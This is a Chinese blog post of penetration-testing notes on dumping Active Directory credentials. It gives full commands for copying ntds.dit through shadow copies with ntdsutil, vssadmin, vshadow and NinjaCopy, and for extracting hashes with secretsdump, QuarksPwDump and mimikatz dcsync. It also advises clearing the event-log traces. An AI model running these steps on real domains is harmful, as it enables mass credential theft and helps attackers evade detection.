域内密码凭证获取

最新推荐文章于 2024-04-30 20:09:14 发布
最新推荐文章于 2024-04-30 20:09:14 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/130333222
版权

Volume Shadow Copy

活动目录数据库

ntds.dit:活动目录数据库,包括有关域用户、组和成员身份的 信息。它还包括域中所有用户的哈希值。

ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.dit

system文件位置:%SystemRoot%\System32\config\System

sam文件位置:%SystemRoot%\System32\config\SAM

%SystemRoot%是系统安装目录,C:\Windows

AD DS数据库存储:

  • 由ntds.dit文件构成
  • 默认存储在所有域控制器上的%SystemRoot%\NTDS文件夹中
  • 只能通过域控制器进程和协议访问

由于Windows阻止这些文件的标准读取或复制操作,因此必须使用特殊技术来获取副本

Volume Shadow Copy(卷影复制

方法一:ntdsutil命令行工具获取

交互式:

ntdsutil
snapshot
activate instance ntds
create
mount [GUID]    //mount挂载
unmount [GUID]    //copy完成后再执行卸载
del [GUID]
quit
quit

非交互式:

1、查询当前系统的快照

ntdsutil snapshot "List All" quit quit
ntdsutil snapshot "List Mounted" quit quit

 2、创建快照

ntdsutil snapshot "activate instance ntds" create quit quit

3、挂载快照

ntdsutil snapshot "mount {GUID}" quit quit

 4、卸载快照

ntdsutil snapshot "unmount {GUID}" quit quit

5、删除快照

ntdsutil snapshot "delete {GUID}" quit quit

终极指令:

ntdsutil "activate instance ntds" ifm "create full c:\hjw" quit quit

方法二:vssadmini

VSSAdmini:是Windows系统提供的卷影复制服务(VSS)的管理工具,域环境默认安装。

  • 用于创建或 删除卷影复制副本,列出卷影副本的信息
  • 用于显示所安装的所有卷影副本写入程序和提供程序
  • 改变卷影副本储存空间的大小

1、查询当前系统的 快照

vssadmin list shadows

2、创建快照

vssadmin create shadow /for=c:

 3、获得shadow copy volume name

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10

 4、复制ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy10\windows\NTDS\ntds.dit c:\ntds3.dit

5、删除快照

vssadmin delete shadows /for=c: /quiet

方法三:vshadow

Vshadow:是一个简单的指令行工具,它允许任何人创建卷影拷贝。系统默认不支持,可以在Microsoft Mindows Software Development Kit(SDK)中获取工具。

1、查询当前系统的快照

vshadow.exe -q

2、创建快照

vshadow.exe -p -nw C:

详细参数说明

-p   -> persistent,备份操作或是重启系统不会删除
-nw -> no writers,用来提供创建速度
C:  -> 对应c盘

获得SnapshotSetID,SnapshotID,Shadow copy device name

3、复制ntds.dit

copy [Shadow copy device name]\windows\ntds\ntds.dit c:\ntds.dit

这个就是对应上面的第三个黄色框框

4、删除快照

vshadow -dx=ShadowCopySetId
vshadow -ds=ShadowCopyId

扩展:

  • 调用Volume Shadow Copy服务会产生日志文件,位于System下,Event ID为7036

执行

ntdsutil snapshot "activate instance ntds" create quit quit

会额外产生EventID为98的日志文件

所以要记得清理痕迹

  • 访问快照中的文件

1、创建一个快照文件

vssadmin create shadow /for=c:

2、查看快照列表

vssadmin list shadows

3、创建符号链接访问快照中的文件

mklink /d c:\hjw [卷影副本]

删除符号链接

rd c:\hjw

NinjaCopy

通过NinjaCopy获取域控服务器NTDS.dit文件

没有调用Volume Shadow Copy服务,所以不会产生7036

解密ntds.dit

1、QuarkPwDump

Quarks Pw Dump是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地账户、域账户、缓存的域账户和Bitlocker。

  • 修复复制出来的数据库文件
esentutl /p /o ntds.dit

  • 使用QuarksPwDump直接读取信息并将结果导出至文件
QuarksPwDump.exe --dump-hash-domain --ntds-file ntds.dit --output cndragon.txt

  • 查看里面的数据
type cndragon.txt

2、Secretsdump

impacket套件中的secretsdump.py脚本解密,速度有点慢

secretsdump.exe -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
secretsdump.exe -system system.hive -ntds ntds.dit LOCAL

3、NtdsAudit

可以 十分高效的破解ntds文件并将全部域域用户信息导出方便查找域用户状态。

将ntds.dit文件和SYSTEM文件放在同已目录下执行命令

NtdsAudit.exe "ntds.dit" -s "system.hive" -p pwdump.txt --users-csv users.csv

这里很遗憾我没有操作成功

4、mimikatz

Mimikatz有一个功能(dscync),它可以利用目录复制信息(DRS),从NTDS.DIT文件中提取密码hash值。这里需要在域控主机上进行操作

  • 通过dcsync直接获取cn-dragon.cn域内所有用户hash
lsadump::dcsync /domain:cn-dragon.cn /all /csv

  • 查看所有用户的所有详细信息
privilege::debug    //必须先执行这个指令获取权限
lsadump::lsa /inject

不习惯有你
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwdumpstats:脚本来输出弱密码周围的统计信息,并从NtdsAudit(pwdump)文件中重复使用密码
05-11
pwdumpstats pwdumpstats是一个python脚本,用于从pwdump文件生成统计信息,包括使用重复的密码。 它还可以读取使用开膛手John或hashcat破解的密码,以显示使用中最常见的弱密码。 尽管它可以与任何pwdump文件(甚至更简单的username:hash文件)一起使用,但最好与的输出,这将使其输出更多的统计信息,例如与非活动和管理帐户有关的统计信息。 欢迎发表评论和提出要求。 用法 pwdumpstats将尝试通过查看$JOHN环境变量来查找John的pot文件(其中包含破解的密码)。 如果未设置,则可以使用--pot手动将pot文件传递给它。 它也支持来自hashcat的pot文件,并可能支持其他工具,只要它们使用相同的格式即可。 usage: pwdumpstats.py [options] <pwdumpfile> optional argu
内计算机和用户获取实现vbs代码
09-05
内计算机和用户获取(转自冰点极限-赤龙),学习vbs的朋友可以参考下。
内网渗透-windows获取(本地、Ntds.dit)登录凭证实战手法总结(超详细)
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-03 1562
获取一台内主机权限时,接下来的渗透思路就是要获取更高权限的账号,用来访问控或横向拓展,那么在获取本地用户、用户凭证获取Ntds.dit这一块就极其重要,将详细介绍红队渗透中使用获取登录凭证的手法。
Windows密码凭证获取 (゚益゚メ) 渗透测试
qq_53058639的博客
01-14 499
和我们常规Windows电脑不同的是,中的账户密码采用的是集中管理而非本地模式,所以一旦我们拿到了控(DC),就可以拿到中所有用户的口令。注:下方所有演示的目标机是在一台控中进行的,我们常规电脑和中非控电脑都无法进行下列操作!
环境密码凭证获取
LuckySec
10-19 1786
在拿到管理员权限之后,通常会提取所有用户的密码Hash进行离线破解和分析,或者通过Hash传递等方式进一步横向渗透。这些密码Hash存储在控制器数据库文件中(C:\Windows\NTDS\NTDS.dit),并包含一些附加信息,如组成员和用户。
渗透测试-密码凭证获取
懂进攻知防守
08-19 1003
Ntds.dit是主要的AD数据库,包括有关用户,组和组成员身份的信息。它还包括中所有用户的密码哈希值。为了进一步保护密码哈希值,使用存储在 **SYSTEM** 注册表配置单元中的密钥对这些哈希值进行加密。第二个加密步骤是为了执行密码转储以进行审计,需要两个文件的副本。
(6.3)【PC中数据隐藏】winodws中隐写:卷影技术(隐藏数据或程序)
06-04 1130
【windows中隐写】卷影隐写
ntds.dit文件的获取与解密
热门推荐
Shanfenglan's blog
08-21 28万+
它们在哪儿? ntds.dit文件是环境中控上会有的一个文件,这个文件存储着内所有用户的凭据信息(hash)。非环境也就是在工作组环境中,有一个sam文件存储着当前主机用户的密码信息,想要破解sam文件与ntds.dit文件都需要拥有一个system文件。 ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit system文件位置:C:\Windows\System32\config\SYSTEM sam文件位置:C:\Windows\System32\config\SAM
网络安全必备:Kali 中扫描器和爆破工具的选用与实践
weixin_43263566的博客
12-28 3338
kail - 扫描与爆破
环境添加网络共享登录凭证
03-10
环境添加网络共享登录凭证 登录需要输入用户名与密码的解决方法
python修改帐户密码
05-20
python写的简易修改帐户密码网站,flask + bootstrap
PHP获取文本框、密码、按钮的值实例代码
01-21
获取表单元素提交的值是表单应用中最基本的操作方法。本节中定义 POST()方法提交数据,对...在程序开发过程中,获取文本框、密码、隐藏、按钮以及文本的值的方法是相同的,都是使用 name 属性来获相应的 value 属
批量新建AD账号密码
01-19
弄了1天,终于弄好了。都设定好后,直接生成,用户也不是禁用状态
Linux服务器安全基础 - 查看入侵痕迹
eagle89的专栏
04-30 565
Linux服务器安全基础 - 查看入侵痕迹
等保测评常见安全风险
weixin_64392888的博客
04-28 505
9. **网络分段风险**:二级及以上系统应将重要网络区和非重要网络区划分在不同网段或子网,避免生产网络和办公网络混在一起带来的风险。1. **信息泄露风险**:评估系统中存储、传输和处理的敏感信息的安全性,防止数据被非法获取,避免个人隐私泄露或公司机密泄露等问题。13. **个人信息保护风险**:二级及以上系统在未授权的情况下不应采集、存储用户个人隐私信息,避免违规行为带来的风险。5. **不安全的通信风险**:评估传输数据时的加密和解密机制,确保数据在传输过程中的安全,防止数据被窃听或篡改。
CNCERT:关于汽车数据处理4项安全要求检测情况的通报 (第一批)
最新发布
南七小僧的学海无涯
04-30 541
本次检测根据《汽车数据安全管理若干规定(试行)》有关要求,按照GB/T 41871-2022《信息安全技术 汽车数据处理安全要求》和T/CAAMTB 77-2022《汽车传输视频及图像脱敏技术要求与方法》相关技术标准,并参考《汽车数据通用要求(报批稿)》附录C组织实施。检测采用相同的测试要求、测试环境、技术标准和测试流程,包括车外人脸信息等匿名化处理、默认不收集座舱数据、座舱数据车内处理以及处理个人信息显著告知4项要求。e.查阅、复制其个人信息以及删除车内、请求删除已经提供给车外的个人信息的方式和途径;
网络安全实训Day16
Yisitelz的博客
04-26 659
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
Go语言的map并发读写如何保证安全
技术笔记
04-28 887
为了保证Go语言中map的并发安全,我们可以使用互斥锁(如sync.Mutex或)来保护对map的访问,或者使用并发安全的map实现(如sync.Map选择哪种方式取决于具体的应用场景和需求。在大多数情况下,使用互斥锁是一个灵活且可靠的选择,而sync.Map则适用于特定的读多写少场景。推荐阅读Golang实战项目分享Golang专栏Go语言异常处理方式。
win7凭证管理密码密码怎么看
11-16
在Windows 7中,您可以通过以下步骤来查看凭证管理器密码密码密码: 1. 打开控制面板:单击“开始”按钮,然后选择“控制面板”。 2. 打开凭证管理器:在控制面板中,选择“用户账户和家庭安全”,然后选择“凭据管理器”。 3. 查看保存的凭据:在凭据管理器中,您可以看到保存的凭据列表,包括网络密码、Windows凭据和证书密码。单击其中的一个凭据项,然后选择“显示密码”选项。 4. 输入您的Windows密码:系统会要求您输入您的Windows密码以确认您的身份。 5. 查看密码:输入密码后,您就可以看到保存的密码内容了。 至于密码密码,您也可以通过凭据管理器来管理和查看。在凭据管理器中,选择“Windows凭据”,然后可以查看和编辑保存的密码密码信息。 需要注意的是,查看和管理密码需要管理员权限,确保您有足够的权限来执行这些操作。另外,为了安全起见,建议您定期更改密码并注意密码安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值